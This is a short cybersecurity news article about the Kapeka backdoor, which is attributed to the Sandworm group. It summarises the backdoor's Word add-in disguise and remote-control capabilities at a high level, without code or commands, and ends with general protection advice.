AI DevwWrld CyberDSA Chatbot Summit Cyber Revolution Summit CYSEC Global Cyber Security & Cloud Expo World Series Digital Identity & Authentication Summit Asian Integrated Resort Expo Middle East Low Code No Code Summit TimeAI Summit

Kapeka: the new cyber threat from Russia

Discovering and analyzing a new global cybersecurity challenge

The Kapeka backdoor, identified by WithSecure, is a threat to Windows, linked to the Sandworm group. It disguises itself as a Word add-in and handles malicious operations remotely.

This pill is also available in Italian language

Recently discovered by the Finnish company WithSecure, the Kapeka backdoor, also known as KnuckleTouch by Microsoft, has a significant impact on Windows operating systems. This cyber threat, linked to the Russian-affiliated Sandworm APT group, operates mainly in Eastern Europe, with attacks recorded in Estonia and Ukraine since mid-2022. Kapeka is characterized by its versatility, being capable of acting both as an initial tool for cyber-attacks and as persistent remote access to victims' assets.

Technical details and use of Kapeka in cyber attacks

The Kapeka backdoor is implemented as a Windows DLL written in C++, featuring advanced command and control (C2) functionality. This malicious module disguises itself as an add-in for Microsoft Word to avoid detection, executing multi-threaded operations to effectively handle commands received from the C2 server. Its capabilities include reading and writing files, executing shell commands, and self-management through updates or autonomous uninstallation, thus increasing its stealth and efficiency in cyber espionage attacks or ransomware distribution.

Relationships between Kapeka and other malware families

WithSecure highlighted links between Kapeka and other well-known malware families such as GreyEnergy and BlackEnergy, indicating a possible evolution within Sandworm's strategy. Furthermore, a similarity in attack techniques was observed linking Kapeka to recent ransomware campaigns, such as that of Prestige. These associations suggest that Sandworm's arsenal is continually evolving, refining existing tools or developing new ones to increase the effectiveness of attacks.

Tips for protecting against the Kapeka threat

Microsoft has detected the use of "living-off-the-land" techniques, such as using the certutil utility to recover the dropper from compromised websites, emphasizing the importance of a proactive strategy in cybersecurity. It is essential to keep systems updated and conduct regular checks on codes and configurations. Promoting security awareness within organizations is crucial to mitigating the risk of infection from malware like Kapeka and protecting sensitive data and critical infrastructure.

Follow us on Facebook for more pills like this

04/23/2024 18:26

Marco Verro

Last pills

Italy's success in cybersecurityHow Italy achieved excellence in global cybersecurity: strategies, collaborations, and international successes

IntelBroker alleged breach of Deloitte systemsServer exposed: how Deloitte's security may have been compromised by a cyber attack

Vo1d infections on Android TV boxes: how to protect your devicesLearn the essential measures to protect your Android TV boxes from the dreaded Vo1d malware and keep your devices safe from cyber threats

Hacker attack in Lebanon: Hezbollah under fireTechnological shock and injuries: cyber warfare hits Hezbollah in Lebanon